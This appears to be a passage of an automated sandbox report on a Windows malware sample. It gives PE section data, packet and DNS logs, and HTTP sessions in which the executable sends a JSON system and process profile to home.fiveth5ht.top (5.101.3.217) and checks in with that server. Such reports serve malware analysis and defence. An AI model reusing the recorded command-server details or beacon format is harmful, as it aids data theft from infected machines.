| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |  |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |  |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |  |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |  |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|  | 0x1000 | 0x6db000 | 0x288a00 | eaf66eb70c3eefdee7b49964574cc058 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x6dc000 | 0x1ac | 0x200 | 7d68f4cff1ad50018c73c464b14fdc91 | False | 0.580078125 | data | 4.553686270674705 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x6dd000 | 0x1000 | 0x200 | 6363462e4ea156e03144265f6be7871e | False | 0.166015625 | data | 1.1763897754724144 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
|  | 0x6de000 | 0x380000 | 0x200 | 99264c5ec7320ed6da2e4754b91d6d8f | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| gjdrirkr | 0xa5e000 | 0x1ad000 | 0x1ac600 | 795ff55d1e1a7e00a8f8b31ec4f232de | False | 0.9943839819813248 | data | 7.954844497774828 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| agpnebbv | 0xc0b000 | 0x1000 | 0x400 | fb1a4b68cbc80eb2349c28614bcc03d1 | False | 0.8134765625 | data | 6.233280855253831 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .taggant | 0xc0c000 | 0x3000 | 0x2200 | 7a2a3a8386ae5bb1e0a760a7980f66c3 | False | 0.06767003676470588 | DOS executable (COM) | 0.7359956789870232 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
| RT_MANIFEST | 0xc0a3b4 | 0x152 | ASCII text, with CRLF line terminators |  |  | 0.6479289940828402 |
| DLL | Import |
| kernel32.dll | lstrcpy |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
                                                            Dec 27, 2024 14:53:23.704555035 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.704648972 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.704658985 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.704668999 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.704689980 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.704703093 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.704711914 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.704740047 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.704761982 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.704804897 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.704873085 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.704883099 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.704921961 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.704966068 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.705019951 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.705095053 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.705106020 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.705143929 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.705250025 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.705358028 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.705455065 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.705498934 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.705580950 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.705667973 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.705789089 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.705827951 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.705923080 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.705971003 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.706060886 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.706060886 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.706118107 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.706135988 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.706182003 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.706218958 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.706259012 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.706275940 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.706315041 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.706331015 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.706371069 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.706396103 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.706449032 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.706528902 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.706574917 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.749504089 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.749561071 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.824145079 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.824184895 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.824228048 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.824234962 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.824263096 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.824295044 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.824311972 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.824426889 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.824465990 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.824523926 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.824651003 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.824742079 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.824812889 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.824853897 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.824928045 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.825007915 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.825023890 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.825074911 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.825110912 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.825256109 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.825267076 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.825303078 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.825603962 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.825613022 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.825624943 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.825681925 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.825710058 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.825736046 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.825762987 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.825794935 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.825833082 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.825876951 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.825886011 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.825936079 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.825956106 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.825978041 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.826026917 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.826057911 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.826066971 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.826123953 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.826188087 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.826209068 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.826365948 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.826414108 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.826467991 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.826477051 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.826767921 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.826781034 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.826790094 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.826798916 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.826807976 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.826817036 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.826826096 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.826837063 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.827003956 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.827013016 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.827020884 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.827032089 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.827243090 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.827253103 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.827260971 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.827279091 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.827323914 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.827333927 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.827395916 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.827454090 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.827533960 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.827634096 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.827644110 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.827652931 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.827737093 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.827748060 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.827841997 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.827852964 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.827956915 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.828010082 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.828077078 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.869193077 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.944521904 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.944538116 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.944546938 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.944598913 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.944608927 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.944753885 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.945229053 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.945254087 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.945265055 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.945334911 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.945348024 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.945358038 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.945394993 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.945425987 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.945555925 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.945611000 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.945792913 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.945802927 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.945811033 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.945827961 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.945908070 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.945966959 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.945976019 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.945986032 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.946139097 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.946147919 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.946177959 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.946197033 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.946258068 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.946300983 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.946403027 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.946410894 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.946484089 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.946494102 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.946633101 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.946683884 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.946759939 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.946805954 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.946850061 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.946991920 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947010040 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947020054 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947143078 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947153091 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947202921 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947211981 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947278023 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947349072 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947359085 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947437048 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947446108 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947496891 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947555065 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947566032 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947673082 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947683096 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947751045 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947830915 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947840929 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947851896 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947943926 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947954893 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.948244095 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:24.065222979 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.065238953 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.065248966 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.065260887 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.065279007 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.065289021 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.065298080 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.065309048 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.065408945 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.065455914 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.065540075 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.065584898 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.065730095 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.065738916 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.065768003 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.065778017 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.065905094 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.065916061 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.065951109 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.066006899 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.066088915 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.066106081 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.066154003 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.066211939 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.066248894 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.066349983 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.066359997 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.066390038 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.066481113 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.066493034 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.066554070 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.066564083 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.066665888 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.066677094 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.066723108 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.066740036 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.066864014 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.066880941 CET80497315.101.3.217192.168.2.4
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Dec 27, 2024 14:53:16.167752028 CET | 192.168.2.4 | 1.1.1.1 | 0xa428 | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 14:53:16.167824984 CET | 192.168.2.4 | 1.1.1.1 | 0x3429 | Standard query (0) | httpbin.org | 28 | IN (0x0001) | false |
| Dec 27, 2024 14:53:21.575948954 CET | 192.168.2.4 | 1.1.1.1 | 0xc82b | Standard query (0) | home.fiveth5ht.top | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 14:53:21.576014042 CET | 192.168.2.4 | 1.1.1.1 | 0xe984 | Standard query (0) | home.fiveth5ht.top | 28 | IN (0x0001) | false |
| Dec 27, 2024 14:53:26.546026945 CET | 192.168.2.4 | 1.1.1.1 | 0xe998 | Standard query (0) | home.fiveth5ht.top | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 14:53:26.546087980 CET | 192.168.2.4 | 1.1.1.1 | 0x2790 | Standard query (0) | home.fiveth5ht.top | 28 | IN (0x0001) | false |
| Dec 27, 2024 14:53:28.366209030 CET | 192.168.2.4 | 1.1.1.1 | 0x51d6 | Standard query (0) | home.fiveth5ht.top | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 14:53:28.366209030 CET | 192.168.2.4 | 1.1.1.1 | 0xf62 | Standard query (0) | home.fiveth5ht.top | 28 | IN (0x0001) | false |

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Dec 27, 2024 14:53:16.477438927 CET | 1.1.1.1 | 192.168.2.4 | 0xa428 | No error (0) | httpbin.org | | 34.226.108.155 | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 14:53:16.477438927 CET | 1.1.1.1 | 192.168.2.4 | 0xa428 | No error (0) | httpbin.org | | 3.218.7.103 | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 14:53:22.273735046 CET | 1.1.1.1 | 192.168.2.4 | 0xc82b | No error (0) | home.fiveth5ht.top | | 5.101.3.217 | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 14:53:26.684243917 CET | 1.1.1.1 | 192.168.2.4 | 0xe998 | No error (0) | home.fiveth5ht.top | | 5.101.3.217 | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 14:53:28.504065037 CET | 1.1.1.1 | 192.168.2.4 | 0x51d6 | No error (0) | home.fiveth5ht.top | | 5.101.3.217 | A (IP address) | IN (0x0001) | false |

                                                            • httpbin.org
                                                            • home.fiveth5ht.top
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.4 | 49731 | 5.101.3.217 | 80 | 7292 | C:\Users\user\Desktop\BkB1ur7aFW.exe |

Timestamp: Dec 27, 2024 14:53:22.495835066 CET; Bytes transferred: 12360; Direction: OUT; Data:
POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                            Host: home.fiveth5ht.top
                                                            Accept: */*
                                                            Content-Type: application/json
                                                            Content-Length: 444891
                                                            Data Ascii: { "ip": "8.46.123.189", "current_time": "8532915458317136206", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 988 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 696 }, { "name": "svchost.exe" [TRUNCATED]
Timestamp: Dec 27, 2024 14:53:26.475286961 CET; Bytes transferred: 157; Direction: IN; Data:
HTTP/1.1 200 OK
                                                            Server: nginx/1.22.1
                                                            Date: Fri, 27 Dec 2024 13:53:26 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Content-Length: 1
                                                            Connection: close
                                                            Data Raw: 30
                                                            Data Ascii: 0


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 1 | 192.168.2.4 | 49732 | 5.101.3.217 | 80 | 7292 | C:\Users\user\Desktop\BkB1ur7aFW.exe |

Timestamp: Dec 27, 2024 14:53:26.805668116 CET; Bytes transferred: 98; Direction: OUT; Data:
GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1
                                                            Host: home.fiveth5ht.top
                                                            Accept: */*
Timestamp: Dec 27, 2024 14:53:28.288899899 CET; Bytes transferred: 372; Direction: IN; Data:
HTTP/1.1 404 NOT FOUND
                                                            Server: nginx/1.22.1
                                                            Date: Fri, 27 Dec 2024 13:53:28 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Content-Length: 207
                                                            Connection: close
                                                            Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 2 | 192.168.2.4 | 49733 | 5.101.3.217 | 80 | 7292 | C:\Users\user\Desktop\BkB1ur7aFW.exe |

Timestamp: Dec 27, 2024 14:53:28.625020027 CET; Bytes transferred: 171; Direction: OUT; Data:
POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                            Host: home.fiveth5ht.top
                                                            Accept: */*
                                                            Content-Type: application/json
                                                            Content-Length: 31
                                                            Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                            Data Ascii: { "id1": "0", "data": "Done1" }
Timestamp: Dec 27, 2024 14:53:30.142879963 CET; Bytes transferred: 372; Direction: IN; Data:
HTTP/1.1 404 NOT FOUND
                                                            Server: nginx/1.22.1
                                                            Date: Fri, 27 Dec 2024 13:53:29 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Content-Length: 207
                                                            Connection: close
                                                            Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.4 | 49730 | 34.226.108.155 | 443 | 7292 | C:\Users\user\Desktop\BkB1ur7aFW.exe |

Timestamp: 2024-12-27 13:53:18 UTC; Bytes transferred: 52; Direction: OUT; Data:
GET /ip HTTP/1.1
                                                            Host: httpbin.org
                                                            Accept: */*
Timestamp: 2024-12-27 13:53:19 UTC; Bytes transferred: 224; Direction: IN; Data:
HTTP/1.1 200 OK
                                                            Date: Fri, 27 Dec 2024 13:53:18 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 31
                                                            Connection: close
                                                            Server: gunicorn/19.9.0
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Credentials: true
